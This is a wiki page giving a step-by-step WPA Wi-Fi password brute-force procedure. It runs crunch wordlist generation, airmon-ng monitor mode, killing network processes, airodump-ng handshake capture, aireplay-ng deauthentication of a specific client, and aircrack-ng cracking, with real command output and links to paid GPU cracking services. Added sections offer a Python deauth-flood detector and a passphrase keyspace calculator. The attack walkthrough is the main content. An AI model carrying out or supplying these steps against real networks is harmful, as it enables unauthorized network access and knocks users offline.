WLAN brute-force attack: Difference between revisions

From Xinux Wiki
=Procedure=

#Generate a password list
#Find the interface
#Put the interface into monitor mode
#Kill interfering processes
#List the WLANs
#Capture the AP
#Wait for a client handshake (possibly kill the connection)
#Start the brute force against the capture file
#Success
 
  
 
 
=Generate the password list=
 
*crunch  8 8 0123456789 -o password.lst
 
<pre>
 
Crunch will now generate the following amount of data: 900000000 bytes
 
858 MB
 
0 GB
 
0 TB
 
0 PB
 
Crunch will now generate the following number of lines: 100000000
 
 
crunch:  19% completed generating output
 
 
crunch:  38% completed generating output
 
 
crunch:  58% completed generating output
 
 
crunch:  76% completed generating output
 
 
crunch:  95% completed generating output
 
 
crunch: 100% completed generating output
 
</pre>
 
=List interfaces=
 
*airmon-ng
 
<pre>
 
PHY Interface Driver Chipset
 
 
phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
 
phy1 wlan1 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
 
</pre>
 
=Monitor mode=

*airmon-ng start wlan1
 
<pre>
 
Found 5 processes that could cause trouble.
 
If airodump-ng, aireplay-ng or airtun-ng stops working after
 
a short period of time, you may want to kill (some of) them!
 
 
  PID Name
 
  618 NetworkManager
 
  712 wpa_supplicant
 
  825 avahi-daemon
 
  826 avahi-daemon
 
1520 dhclient
 
 
PHY Interface Driver Chipset
 
 
phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
 
phy1 wlan1 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
 
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
 
(mac80211 station mode vif disabled for [phy1]wlan1)
 
</pre>
 
=Kill the interfering processes=
 
*kill -9 618
 
*kill -9 712
 
*kill -9 825
 
*kill -9 826
 
*kill -9 1520
 
 
=Check=
 
*airmon-ng check wlan1mon
 
No interfering processes found
 
*If anything is still running:
 
 
systemctl disable avahi-daemon
 
 
service network-manager stop
 
 
=dump=
 
We are looking for the BSSID of dd-wrt.
 
*airodump-ng wlan1mon
 
[[Datei:wlan1mon1.jpg]]
 
 
=Get the handshake=

*BSSIDCLIENT=44:74:6C:54:68:E8 # needed later
 
*BSSIDAP=00:18:F8:DA:F7:94
 
*airodump-ng --bssid $BSSIDAP -c 6 -w wlan.cap wlan1mon
 
[[Datei:wlan1mon2.jpg]]
 
 
==Open a second window==
 
*aireplay-ng -0 50 -a  00:18:F8:DA:F7:94 -c 44:74:6C:54:68:E8 wlan1mon
 
<pre>
 
11:02:39  Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel 6
 
11:02:39  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 4 ACKs]
 
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 6 ACKs]
 
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 8 ACKs]
 
11:02:41  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 7 ACKs]
 
11:02:44  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|43 ACKs]
 
11:02:49  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [36|68 ACKs]
 
11:02:55  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
 
11:03:00  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
 
11:03:05  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
 
11:03:10  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
 
11:03:15  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
11:03:21  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 4|65 ACKs]
 
11:03:26  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
11:03:32  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|61 ACKs]
 
11:03:37  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|65 ACKs]
 
11:03:42  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|63 ACKs]
 
11:03:47  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
11:03:52  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
11:03:57  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [26|67 ACKs]
 
11:04:02  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
 
11:04:07  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
 
11:04:12  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
</pre>
 
until the client gets kicked off
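Seen from the defender's side, the burst pattern in the log above stands out on a monitoring sensor. The following is an added example, not part of the original wiki page: it counts deauthentication frames per AP/client pair in a sliding window over constructed records; the record layout, window and threshold are assumptions.

```python
from collections import defaultdict, deque

AP = "00:18:F8:DA:F7:94"    # BSSID shown on the page
STA = "44:74:6C:54:68:E8"   # client MAC shown on the page

def build_sample():
    """Constructed sensor records: (time_s, subtype, src, dst, bssid)."""
    recs = [(0.0, "beacon", AP, "FF:FF:FF:FF:FF:FF", AP),
            # a single deauth from another client leaving normally
            (1.0, "deauth", "AA:BB:CC:00:00:01", AP, AP)]
    # Bursts shaped like the log above: 64 frames to each side, every ~5 s
    for burst in range(3):
        t0 = 10.0 + 5 * burst
        for i in range(64):
            recs.append((t0 + i * 0.005, "deauth", AP, STA, AP))
            recs.append((t0 + i * 0.005 + 0.002, "deauth", STA, AP, AP))
    return sorted(recs)

def detect_deauth_floods(records, window_s=1.0, threshold=10):
    """Alert when one (bssid, station) pair sees more than `threshold`
    deauth frames within `window_s` seconds; one alert per burst."""
    recent = defaultdict(deque)   # pair -> timestamps still inside the window
    alerting = set()              # pairs currently above the threshold
    alerts = []
    for ts, subtype, src, dst, bssid in records:
        if subtype != "deauth":
            continue
        station = dst if src == bssid else src   # the non-AP end of the frame
        key = (bssid, station)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) > threshold:
            if key not in alerting:
                alerting.add(key)
                alerts.append({"time": ts, "bssid": bssid, "station": station})
        else:
            alerting.discard(key)   # burst over, re-arm for the next one
    return alerts

if __name__ == "__main__":
    for a in detect_deauth_floods(build_sample()):
        print("deauth flood at %.3fs: %s <-> %s" % (a["time"], a["bssid"], a["station"]))
```

On networks where both AP and clients support 802.11w (Protected Management Frames), clients discard forged deauthentication frames, so an alert like this shows an attempt rather than a forced reconnect.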
 
 
=After reconnecting, the handshake arrives=
 
[[Datei:wlan1mon3.jpg]]
 
==handshake==
 
00:18:F8:DA:F7:94
 
 
=Cracking=
 
*aircrack-ng -w password.lst -b  00:18:F8:DA:F7:94  wlan.cap-01.cap
 
[[Datei:wlan1mon4.jpg]]
 
=Cracking speeds=

A laptop manages about 1000 keys per second.

A powerful graphics card (Titan XP) manages 520000 hash/s.

If needed, you can also rent computing power online:

https://www.gpuhash.me/?menu=en-tasks

or build a cluster of several graphics cards.

Source: http://www.crackingservice.com/?q=node/20
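What these rates mean for passphrase policy, as an added example that is not part of the original wiki page: it reproduces the crunch figures for the 8-digit list and computes how long each character set lasts at the two speeds quoted above. The 100-year target and the character sets compared are assumptions; WPA/WPA2 passphrases are 8 to 63 characters.

```python
LAPTOP_RATE = 1_000    # keys/s, laptop figure from the page
GPU_RATE = 520_000     # hash/s, Titan XP figure from the page
YEAR_S = 365 * 24 * 3600

def keyspace(charset_size, length):
    """Number of candidates of exactly `length` symbols."""
    return charset_size ** length

def wordlist_bytes(charset_size, length):
    """Size of a one-candidate-per-line list (each line ends in a newline)."""
    return keyspace(charset_size, length) * (length + 1)

def seconds_to_exhaust(charset_size, length, rate):
    """Worst-case time to try every candidate at `rate` guesses per second."""
    return keyspace(charset_size, length) / rate

def min_length_for(charset_size, rate, target_seconds):
    """Shortest passphrase length (8..63) whose keyspace lasts target_seconds."""
    for length in range(8, 64):
        if seconds_to_exhaust(charset_size, length, rate) >= target_seconds:
            return length
    return None

def report():
    """Rows: (label, charset size, hours on the laptop for length 8,
    minutes on the GPU for length 8, length needed for 100 GPU-years)."""
    rows = []
    for label, size in (("digits", 10), ("lowercase", 26), ("alphanumeric", 62)):
        rows.append((label, size,
                     seconds_to_exhaust(size, 8, LAPTOP_RATE) / 3600,
                     seconds_to_exhaust(size, 8, GPU_RATE) / 60,
                     min_length_for(size, GPU_RATE, 100 * YEAR_S)))
    return rows

if __name__ == "__main__":
    for row in report():
        print("%-12s charset=%2d  laptop=%.1f h  gpu=%.1f min  100y-length=%d" % row)
```

The first two functions reproduce the crunch output above (100000000 lines, 900000000 bytes); the times are worst-case figures for a single device at the quoted rates.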
 

Current revision as of 7 June 2021, 16:48